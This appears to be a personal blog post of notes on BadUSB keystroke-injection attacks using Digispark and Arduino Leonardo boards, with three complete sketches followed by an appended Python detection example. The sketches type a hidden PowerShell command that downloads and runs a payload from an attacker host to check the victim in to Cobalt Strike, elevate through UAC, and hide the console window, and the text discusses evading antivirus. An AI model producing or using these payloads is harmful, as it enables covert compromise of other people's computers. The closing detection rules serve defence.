BadUSB notes
This_is_Y

BadUSB: I currently have two kinds on hand, the Digispark and the Leonardo. Both are on Taobao; either one will do.

The code for the two boards differs. Personally I find the Leonardo easier to work with.

digispark

Open the Arduino IDE and choose Tools > Board > Digistump AVR Boards > Digispark(Default-16.5mhz).

Then just start writing code.

[screenshot: board selection]

When you want to write the code to the device, click Upload. Once it finishes compiling, you will see:

[screenshot: upload prompt]

At that point plug the BadUSB in.

payload1

This payload uses Win+R to open the Run dialog and runs a PowerShell command that checks the host in to CS. The drawback is that Huorong intercepts the launching of a hidden PowerShell; I have not found a way around that yet.

```cpp
#include "DigiKeyboard.h"
// Key codes that DigiKeyboard.h does not define itself
#define KEY_ESC 41
#define KEY_SHIFT 225
#define KEY_CAPS_LOCK 57

void setup() {
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(0);                    // empty report so the host registers the keyboard
  DigiKeyboard.delay(30);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  // Win+R: open the Run dialog
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);        // Caps Lock so the IME passes letters through
  DigiKeyboard.print("powershell -w Normal -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1');");
  DigiKeyboard.sendKeyPress(0);                     // release all keys
  DigiKeyboard.delay(1000);
  // sendKeyStroke(key, modifiers): the key code goes first, modifier bits second
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT); // Ctrl+Shift+Enter: run as administrator
  DigiKeyboard.sendKeyPress(0);                     // release all keys
  DigiKeyboard.delay(750);
  DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);  // Alt+Y: confirm the UAC prompt
  DigiKeyboard.sendKeyPress(0);                     // release all keys
}

void loop() {
}
```

leonardo

Open the Arduino IDE and choose Tools > Board > Arduino AVR Boards > Arduino Leonardo.

[screenshot: board selection]

Then plug the device in and select its port.

[screenshot: port selection]

For this board, when you want to write code to the device, just click Upload.

payload1

This payload opens the Run dialog with Win+R and enters the PowerShell command, then uses Ctrl+Shift+Enter to run it as administrator (to obtain admin rights) and Alt+Y to get past the UAC prompt. The drawback is that Huorong likewise intercepts the launching of a hidden PowerShell.

```cpp
#include <Keyboard.h>

void setup() {
  Keyboard.begin();                // start HID keyboard output
  delay(5000);                     // give the host time to enumerate the device
  Keyboard.press(KEY_LEFT_GUI);    // Win+R: open the Run dialog
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(500);

  Keyboard.press(KEY_CAPS_LOCK);   // Caps Lock so the IME passes letters through
  Keyboard.print("powershell -w Normal -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:port/payload');");
  Keyboard.release(KEY_CAPS_LOCK);

  delay(500);
  Keyboard.press(KEY_LEFT_CTRL);   // Ctrl+Shift+Enter: run as administrator
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(1500);

  Keyboard.press(KEY_LEFT_ALT);    // Alt+Y: confirm the UAC prompt
  Keyboard.press('y');
  Keyboard.releaseAll();
  delay(1500);
  Keyboard.end();                  // stop HID keyboard output
}

void loop() {}
```

payload2

This payload opens a command-prompt window and shrinks it so the victim does not immediately see the commands. Working this way gets past some AV products more easily and leaves more room to operate.

The actual commands:

```cpp
#include <Keyboard.h>

void setup() {
  Keyboard.begin();                // start HID keyboard output
  delay(300);                      // short pause
  Keyboard.press(KEY_LEFT_GUI);    // Win key
  delay(500);
  Keyboard.press('r');             // R key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);   // turn on Caps Lock so lower-case input gets past the IME
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); // shrink the cmd window to hide it
  // alternative: cmd /c start /min CMD /C START /MIN POWERSHELL -W HIDDEN
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(200);

  Keyboard.println("powershell");
  delay(50);
  Keyboard.println("$clnt = new-object system.net.webclient;");
  delay(50);                       // brief pause; typing too fast garbles the commands
  Keyboard.println("$url='http://ip:port/payload';"); // ip, port and payload: make sure it is reachable
  delay(50);
  Keyboard.println("$file = \"E:\\payload\\test1\";"); // where the file is saved on the target; path separators must be \\
  delay(50);
  Keyboard.println("$clnt.downloadfile($url,$file);"); // run in separate steps to get past process protection
  // Keyboard.println("c:\\windows\\temp\\hy.exe"); // run the dropped file; look into hiding it on D: yourself, since C: may not be writable (idea: attrib +h 1.txt hides a file)

  Keyboard.println("exit");        // leave the PowerShell session
  delay(3000);                     // wait for the download to finish
  Keyboard.println("exit");        // close the small cmd window
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  Keyboard.press(KEY_CAPS_LOCK);   // toggle Caps Lock back off
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();                  // stop HID keyboard output
}

void loop() {
  // put your main code here, to run repeatedly:
}
```
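From the defender's side, all three sketches above leave the same traces on the host: a PowerShell or cmd process launched from the Run dialog with a hidden or shrunken window, and a WebClient download cradle. The block below is an added detection example, written for this page and not part of the original post. It runs three constructed rules over constructed sample events whose field names follow the Sysmon Event ID 1 (process creation) and PowerShell Event ID 4104 (script block logging) schemas; the rule names, the sample command lines and the ip:port placeholder are assumptions made for the example, not real telemetry. It also covers the edge case the payload2 sketch creates: because the commands are typed into an interactive `powershell`, the process command line is empty of indicators, and only script block logging records what was typed.

```python
import re

# Constructed sample events (not real telemetry). Field names follow the
# Sysmon Event ID 1 and PowerShell Event ID 4104 schemas; the command lines
# mirror the three sketches on this page.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w Normal -WindowStyle Hidden -NoLogo "
                    "-executionpolicy bypass IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://ip:port/payload.ps1');"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1"'},
    # payload2 types its commands into an interactive shell, so the process
    # command line is just "powershell" and carries no indicator on its own...
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    # ...but script block logging still records what was typed.
    {"EventID": 4104,
     "ScriptBlockText": "$clnt = new-object system.net.webclient;\n"
                        "$url='http://ip:port/payload';\n"
                        "$file = \"E:\\payload\\test1\";\n"
                        "$clnt.downloadfile($url,$file);"},
    # Benign admin activity that must not fire.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Service -Name Spooler"},
    {"EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
]

# Each rule names the EventID it applies to and, per field, a list of
# case-insensitive regexes that must ALL match. Requiring several indicators
# together keeps noise down: "-WindowStyle Hidden" alone shows up in plenty
# of legitimate scheduled tasks. Rule names are assumptions for this example.
RULES = [
    {"name": "ps_hidden_download_cradle", "event_id": 1, "match": {
        "CommandLine": [
            r"powershell",
            r"-w(indowstyle)?\s+hidden",
            r"-e(xecutionpolicy)?\s+bypass",
            r"(downloadstring|downloadfile|\biex\b|invoke-expression)",
        ]}},
    {"name": "cmd_shrunken_console", "event_id": 1, "match": {
        "ParentImage": [r"explorer\.exe$"],          # launched from the Run dialog
        "CommandLine": [
            r"\bcmd\b",
            r"mode\s+con:?\s*cols=\d{1,2}\s+lines=\d{1,2}",
        ]}},
    {"name": "ps_scriptblock_webclient_download", "event_id": 4104, "match": {
        "ScriptBlockText": [
            r"net\.webclient",
            r"\.download(file|string)\s*\(",
        ]}},
]


def event_matches(event, rule):
    """True when the event has the rule's EventID and every regex of every field matches."""
    if event.get("EventID") != rule["event_id"]:
        return False
    for field, patterns in rule["match"].items():
        text = event.get(field, "")
        if not all(re.search(p, text, re.IGNORECASE) for p in patterns):
            return False
    return True


def scan(events):
    """Return (event index, rule name) for every event that triggers a rule."""
    hits = []
    for idx, event in enumerate(events):
        for rule in RULES:
            if event_matches(event, rule):
                hits.append((idx, rule["name"]))
    return hits


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The third sample event is the one worth remembering: with command-line logging alone, the staged variant looks like someone opening PowerShell by hand. Enabling script block logging (Event ID 4104) closes that gap, and correlating any of these hits with a new keyboard-class device appearing moments earlier (Security Event ID 6416 when PnP device auditing is enabled) is what distinguishes keystroke injection from an administrator at the console.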